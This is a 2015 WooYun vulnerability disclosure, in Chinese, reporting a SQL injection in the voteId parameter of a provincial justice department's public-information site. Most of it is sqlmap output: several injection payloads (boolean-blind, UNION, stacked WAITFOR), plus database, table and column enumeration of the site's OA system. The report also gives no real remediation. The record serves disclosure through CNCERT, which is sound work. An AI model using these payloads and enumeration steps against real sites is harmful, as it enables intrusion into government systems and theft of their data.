当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142681

漏洞标题: 某地方司法厅信息公开网SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: Yang

提交时间:2015-09-24 22:02

修复时间:2015-11-12 19:18

公开时间:2015-11-12 19:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-28: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-08: 细节向核心白帽子及相关领域专家公开
2015-10-18: 细节向普通白帽子公开
2015-10-28: 细节向实习白帽子公开
2015-11-12: 细节向公众公开

简要描述:

oa全泄露

详细说明:

http://**.**.**.**/voteDisp.jsp?voteId=15
参数voteid存在注射

1.png


sqlmap identified the following injection points with a total of 50 HTTP(s) requests:
---
Parameter: voteId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: voteId=15 AND 2576=2576
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: voteId=15 UNION ALL SELECT 24,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(122)+CHAR(68)+CHAR(77)+CHAR(76)+CHAR(119)+CHAR(82)+CHAR(117)+CHAR(80)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113),24--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: voteId=15; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: voteId=15 WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: voteId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: voteId=15 AND 2576=2576
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: voteId=15 UNION ALL SELECT 24,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(122)+CHAR(68)+CHAR(77)+CHAR(76)+CHAR(119)+CHAR(82)+CHAR(117)+CHAR(80)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113),24--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: voteId=15; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: voteId=15 WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] ahsft
[*] master
[*] model
[*] msdb
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: voteId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: voteId=15 AND 2576=2576
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: voteId=15 UNION ALL SELECT 24,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(122)+CHAR(68)+CHAR(77)+CHAR(76)+CHAR(119)+CHAR(82)+CHAR(117)+CHAR(80)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113),24--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: voteId=15; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: voteId=15 WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
Database: ahsft
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| ezoffice.CMS_SITE_STATISTIC | 67432669 |
| ezoffice.CMS_ARTICLE_STATISTIC | 27499461 |
| ezoffice.CMS_CHANNEL_STATISTIC | 14555288 |
| ezoffice.CMS_OPERATION_LOG | 383292 |
| ezoffice.CMS_ARTICLE | 146852 |
| ezoffice.CMS_ARTI_CONTENT | 140478 |
| ezoffice.CMS_ARTI_OPERATION | 100274 |
| ezoffice.SFT_XXBS_SYXX | 98482 |
| ezoffice.SFT_XXBS_WDXX | 95361 |
| ezoffice.SECURITY_LOG | 58471 |
| dbo.BS_XMLFROMBEAN | 48079 |
| ezoffice.OA_ALLATTACH | 21779 |
| ezoffice.CMS_SYSTEM_LOG | 18070 |
| ezoffice.WF_PROCEEDREADWRITECONTROL | 17761 |
| ezoffice.CMS_ARTI_VERSION | 17757 |
| ezoffice.CMS_FILES | 14231 |
| ezoffice.OA_INFORMATIONBROWSER | 8461 |
| ezoffice.ORG_RIGHTSCOPE | 5972 |
| ezoffice.SFT_XXBS_KWXX | 5478 |
| ezoffice.ORG_SYNCRTX | 4999 |
| ezoffice.OA_INFORMATION | 3669 |
| ezoffice.CMS_MESSAGE | 3539 |
| ezoffice.CMS_MESSAGE_REPLY | 3450 |
| ezoffice.ORG_USER_ROLE | 2971 |
| ezoffice.ORG_EMPLOYEE | 2891 |
| ezoffice.ORG_ORGANIZATION_USER | 2887 |
| ezoffice.OA_DISTRICT | 2476 |
| ezoffice.WF_PROCEEDTRANSITION | 2366 |
| ezoffice.CMS_TMPL_CITATION | 2077 |
| ezoffice.WF_PROCEEDTR | 2060 |
| ezoffice.SFT_XXBS_DW | 1985 |
| ezoffice.roles | 1838 |
| ezoffice.CMS_VOTE_PERSON | 1562 |
| ezoffice.WF_PROCEEDACTIVITY | 1532 |
| ezoffice.CMS_MESSAGE_MASTER | 1446 |
| dbo.oldid | 1360 |
| ezoffice.CMS_TEMPLATES_FILES | 1213 |
| ezoffice.CMS_TMPL_FILE_OPERATION | 1203 |
| ezoffice.CMS_ARTI_CHANNEL | 978 |
| ezoffice.CMS_INTERVIEW_INFO | 793 |
| ezoffice.WF_DEALWITHLOG | 785 |
| ezoffice.CMS_CONFIG | 679 |
| ezoffice.SFT_XXBS_KW | 626 |
| ezoffice.WF_READWRITECONTROL | 619 |
| ezoffice.Document_File | 468 |
| ezoffice.Document | 466 |
| ezoffice.WF_WORK | 443 |
| ezoffice.OA_INFORORGSTAT | 438 |
| ezoffice.SECURITY_ONLINEUSER | 422 |
| ezoffice.OA_INFORPERSONALSTAT | 364 |
| ezoffice.wf_proceedflow | 321 |
| ezoffice.OA_INFORMATIONHISTORY | 319 |
| ezoffice.WF_DEALWITHCOMMENT | 286 |
| ezoffice.CMS_USERPOWER | 277 |
| ezoffice.WF_DEALWITH | 263 |
| ezoffice.ah_xxflbackup | 221 |
| ezoffice.OA_INFORMATIONACCESSORY | 221 |
| ezoffice.SFT_XXBS_XXCY | 210 |
| ezoffice.OA_MAIL_USER | 209 |
| ezoffice.WF_IMMOBILITYFIELD | 205 |
| ezoffice.ORG_ORGANIZATION | 187 |
| ezoffice.ORG_ROLE_RIGHT | 177 |
| ezoffice.CMS_SYNCH_OA_ARTICLE | 152 |
| ezoffice.CMS_QUES_PERSON | 140 |
| ezoffice.OA_MAILINTERIOR | 140 |
| ezoffice.CMS_AHSFT_SYNCHARTICLE_RECORD | 136 |
| ezoffice.OA_LINKMAN | 124 |
| ezoffice.ORG_RIGHT | 123 |
| ezoffice.SFT_XXBS_CXXX | 123 |
| ezoffice.CMS_PAGE | 105 |
| ezoffice.WF_TRANSITIONRESTRICTION | 100 |
| ezoffice.WF_TRANSITION | 96 |
| ezoffice.CMS_MODULE_OPERATION | 87 |
| dbo.aqsfj | 82 |
| dbo.hfsfj | 76 |
| ezoffice.Template_BookMarks | 74 |
| ezoffice.WF_ACTIVITY | 73 |
| ezoffice.CMS_INTERVIEW_GUEST | 72 |
| dbo.chuzsfj | 70 |
| dbo.fysfj | 70 |
| ezoffice.OA_INFORHISTORYACCESSORY | 67 |
| dbo.hssfj | 66 |
| dbo.xcsfj | 65 |
| dbo.szsfj | 59 |
| ezoffice.OA_ORGWRAP | 59 |
| ezoffice.ORG_ROLE | 59 |
| ezoffice.CMS_VOTE_ITEM | 58 |
| ezoffice.OA_CUSTMENU | 57 |
| ezoffice.OA_MENUSET | 57 |
| ezoffice.OA_INFORMATIONCHANNEL | 54 |
| dbo.czsfj | 48 |
| dbo.bbsfj | 47 |
| dbo.bzsfj | 47 |
| ezoffice.OA_FORUM | 46 |
| ezoffice.GOV_senddocumentTopical | 43 |
| dbo.chsfj | 42 |
| ezoffice.tShow | 40 |
| dbo.jb_message | 39 |
| dbo.whsfj | 39 |
| ezoffice.WF_WORKFLOWWRITECONTROL | 38 |
| dbo.Sheet1$ | 34 |
| ezoffice.CMS_ADVERT | 33 |
| ezoffice.SFT_XXBS_JFBZ | 31 |
| ezoffice.CMS_ADVERT_PLACE | 30 |
| ezoffice.OA_MAILACCESSORY | 30 |
| ezoffice.CMS_ARTI_LINKS | 26 |
| ezoffice.CUSTOMER_CENTER | 26 |
| dbo.cms_dxtj | 25 |
| ezoffice.SECURITY_LOG_MODULE | 25 |
| dbo.hbsfj | 24 |
| ezoffice.CMS_INFO_APPLY | 24 |
| ezoffice.CMS_QUES_ITEM | 24 |
| ezoffice.OA_PERSONALSTAT | 24 |
| ezoffice.OA_WORKLOG | 24 |
| ezoffice.OA_EVENTATTENDER | 23 |
| ezoffice.tElt | 23 |
| ezoffice.tField | 23 |
| ezoffice.WF_GRAPH_UNIT | 23 |
| ezoffice.oa_patchinfo | 22 |
| ezoffice.OA_DUTY | 20 |
| ezoffice.WF_PACKAGE | 20 |
| ezoffice.CMS_SITE | 19 |
| ezoffice.tSign | 19 |
| ezoffice.GOV_DOCUMENTSENDFILE | 18 |
| ezoffice.WF_NEEDFLOWMODULE | 18 |
| ezoffice.oa_boardroom_meetingtime | 17 |
| ezoffice.OA_BOARDROOMAPPLY | 17 |
| ezoffice.WF_IMMOBILITYFORM | 17 |
| ezoffice.CMS_ARTI_STATE | 16 |
| ezoffice.CMS_INTERVIEW | 15 |
| ezoffice.OA_DIARYCLASS | 15 |
| ezoffice.OA_EVENT | 15 |
| ezoffice.CMS_ROLE | 14 |
| ezoffice.OA_OFFICALDICTION | 14 |
| ezoffice.WF_WORKFLOWPROCESS | 14 |
| ezoffice.CMS_VOTE | 13 |
| ezoffice.gov_senddocumentword | 13 |
| ezoffice.MS_COUNT | 13 |
| ezoffice.CMS_ARTI_SOURCE | 12 |
| ezoffice.gov_senddocumentNum | 12 |
| ezoffice.OA_DIARY | 12 |
| ezoffice.Tmp | 12 |
| ezoffice.OA_INFORMATIONCOMMENT | 11 |
| ezoffice.GOV_senddocumentUpdate | 10 |
| ezoffice.GOV_SENDFILE_USER | 10 |
| ezoffice.OA_NETSURVEYVOTE | 10 |
| ezoffice.OA_SOUNDREMIND | 10 |
| ezoffice.CMS_TEMPLATES | 9 |
| ezoffice.OA_NOTEBOOK | 9 |
| ezoffice.tAreatype | 9 |
| ezoffice.Template_File | 9 |
| ezoffice.CMS_QUES_TOPIC | 8 |
| ezoffice.CMS_SYNCH_INFOPUBLIC_CHANNEL | 8 |
| ezoffice.CMS_SYNCH_OA_CHANNEL | 8 |
| ezoffice.MS_MODEL | 8 |
| ezoffice.OA_NETADDRESS | 8 |
| ezoffice.OA_NETADDRESSCLASS | 8 |
| ezoffice.SFT_XXBS_KWQS | 8 |
| ezoffice.CMS_MESSAGECATEGORY | 7 |
| ezoffice.CMS_MODULE | 7 |
| ezoffice.kill_kk | 7 |
| ezoffice.OA_BOARDROOM | 7 |
| ezoffice.SFT_XXBS_UNION | 7 |
| ezoffice.CMS_ARTI_KEYWORD | 6 |
| ezoffice.CMS_QUES_TEXT | 6 |
| ezoffice.GOV_SENDFILEBROWSER | 6 |
| ezoffice.GOV_SENDFILECHECKWITHWORKFLOW | 6 |
| ezoffice.OA_SOUNDSET | 6 |
| ezoffice.OA_WORKREPORTLEADER | 6 |
| ezoffice.OA_DEPARTMENTSTYLE | 5 |
| ezoffice.OA_LINKMANCLASS | 5 |
| ezoffice.OA_WORKREPORT | 5 |
| ezoffice.ORG_USER_GROUP | 5 |
| ezoffice.CMS_QUESTIONNAIRE | 4 |
| ezoffice.OA_BDROOMAPPACCESSORY | 4 |
| ezoffice.OA_FORUMCLASS | 4 |
| ezoffice.OA_MAILUSERBOX | 4 |
| ezoffice.oa_maturity_alert_settings | 4 |
| ezoffice.OA_NETSURVEYITEM | 4 |
| ezoffice.tType | 4 |
| dbo.BookMarks | 3 |
| ezoffice.ah_roles | 3 |
| ezoffice.ah_xxcheck | 3 |
| ezoffice.CMS_VERSION | 3 |
| ezoffice.OA_ASSOCIATEINFO | 3 |
| ezoffice.OA_BDROOMAPPTYPE | 3 |
| ezoffice.OA_EDITION | 3 |
| ezoffice.OA_TASK | 3 |
| ezoffice.OA_TASKEXEC | 3 |
| ezoffice.tModel | 3 |
| ezoffice.tSession | 3 |
| ezoffice.ah_xxdh | 2 |
| ezoffice.CMS_IP_LIMIT | 2 |
| ezoffice.CMS_IPS | 2 |
| ezoffice.GOV_RECEIVEFILE | 2 |
| ezoffice.GOV_senddocumentBASEINFO | 2 |
| ezoffice.MS_INFODESCRIBE | 2 |
| ezoffice.OA_NETDISK_FILE | 2 |
| ezoffice.OA_RELATIONOBJECT | 2 |
| ezoffice.OA_WORKREPORTPOSTIL | 2 |
| ezoffice.tArea | 2 |
| ezoffice.tCode | 2 |
| ezoffice.tSeq | 2 |
| ezoffice.tTable | 2 |
| ezoffice.ah_fwl | 1 |
| ezoffice.CMS_APPLYFLOW_INFO | 1 |
| ezoffice.CMS_ARTI_CHANNEL_SQL | 1 |
| ezoffice.CMS_ARTI_TYPE | 1 |
| ezoffice.CMS_SEQ | 1 |
| ezoffice.D99_REG | 1 |
| ezoffice.Document_Signature | 1 |
| ezoffice.foofoofoo | 1 |
| ezoffice.GJ_GOODS | 1 |
| ezoffice.GJ_GOODSTYPE | 1 |
| ezoffice.GJ_STOCK | 1 |
| ezoffice.GJ_STOCK_GOODSTYPE | 1 |
| ezoffice.GOV_documentUnit | 1 |
| ezoffice.gov_ReceiveFileSeq | 1 |
| ezoffice.gov_senddocumentseq | 1 |
| ezoffice.GOV_SENDFILENOBROWSER | 1 |
| ezoffice.gov_wflowResave | 1 |
| ezoffice.OA_ARCHIVESCLASS | 1 |
| ezoffice.OA_ARCHIVESDOSSIER | 1 |
| ezoffice.OA_CUSTOMDESKTOPLAYOUT | 1 |
| ezoffice.OA_FESTIVALSET | 1 |
| ezoffice.OA_NETSURVEY | 1 |
| ezoffice.OA_SEQ | 1 |
| ezoffice.OA_UNITINFO | 1 |
| ezoffice.ORG_DOMAIN | 1 |
| ezoffice.ORG_GROUP | 1 |
| ezoffice.ORG_MANAGER | 1 |
| ezoffice.SECURITY_IP | 1 |
| ezoffice.TABLERELATION | 1 |
| ezoffice.tLimit | 1 |
| ezoffice.tPage | 1 |
| ezoffice.WF_WORKFLOWCHANNEL | 1 |
| ezoffice.WF_WORKFLOWSTOCK | 1 |
+----------------------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: voteId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: voteId=15 AND 2576=2576
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: voteId=15 UNION ALL SELECT 24,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(122)+CHAR(68)+CHAR(77)+CHAR(76)+CHAR(119)+CHAR(82)+CHAR(117)+CHAR(80)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113),24--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: voteId=15; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: voteId=15 WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
Database: ahsft
Table: ezoffice.CMS_SITE_STATISTIC
[5 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| INTERVIEW_DATE | datetime |
| INTERVIEW_IP | varchar |
| SITE_ID | numeric |
| STATISTIC_ID | numeric |
| STATISTIC_TYPE | numeric |
+----------------+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: voteId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: voteId=15 AND 2576=2576
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: voteId=15 UNION ALL SELECT 24,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(122)+CHAR(68)+CHAR(77)+CHAR(76)+CHAR(119)+CHAR(82)+CHAR(117)+CHAR(80)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113),24--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: voteId=15; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: voteId=15 WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
Database: ahsft
Table: ezoffice.CMS_ARTICLE
[41 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| ARTI_ACCESSORY_IDS | varchar |
| ARTI_AUTHOR | varchar |
| ARTI_CODE | varchar |
| ARTI_CREATED_TIME | datetime |
| ARTI_CREATOR_ID | varchar |
| ARTI_CREATOR_ORGID | varchar |
| ARTI_DELETEFLAG | numeric |
| ARTI_EDIT_TIME | datetime |
| ARTI_EDITOR | varchar |
| ARTI_END_TIME | datetime |
| ARTI_FWWH | varchar |
| ARTI_KEYWORD | varchar |
| ARTI_LINK | varchar |
| ARTI_LINK_IDS | varchar |
| ARTI_MAPPING | numeric |
| ARTI_PHOTO_IDS | varchar |
| ARTI_PRESENTATION | varchar |
| ARTI_RELA_ARTICLE | numeric |
| ARTI_RELA_ARTICLE_ID | varchar |
| ARTI_RELA_ARTICLE_SQL | varchar |
| ARTI_SHORTTITLE | varchar |
| ARTI_SHORTTITLE_STYLE | varchar |
| ARTI_SOURCE | varchar |
| ARTI_START_TIME | datetime |
| ARTI_SYMBOL_PHOTO_IDS | varchar |
| ARTI_TITLE | varchar |
| ARTI_VERSION | varchar |
| ARTICLE_ID | numeric |
| ARTICLE_MAPPING_ID | numeric |
| ARTICLE_STATE_ID | numeric |
| ARTICLE_TYPE_ID | numeric |
| CHANNEL_ID | numeric |
| DOMAIN_ID | numeric |
| LOOK_CNT | numeric |
| NEEDTIME_CTRL | numeric |
| RECOMMEND_FLAG | numeric |
| SETTOP_FLAG | numeric |
| SITE_ID | numeric |
| STR1 | varchar |
| STR2 | varchar |
| STR3 | varchar |
+-----------------------+----------+


漏洞证明:

跑了很多就会无法访问 应该有墙。。ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品。
oa里面的数据全部泄露啦啦啦啦
什么都没动。。别查水表

修复方案:

中秋节了。。。兑换的月饼不会过完年才收到吧

版权声明:转载请注明来源 Yang@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-28 19:16

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心,由其后续协调网站管理单位处置。

最新状态:

暂无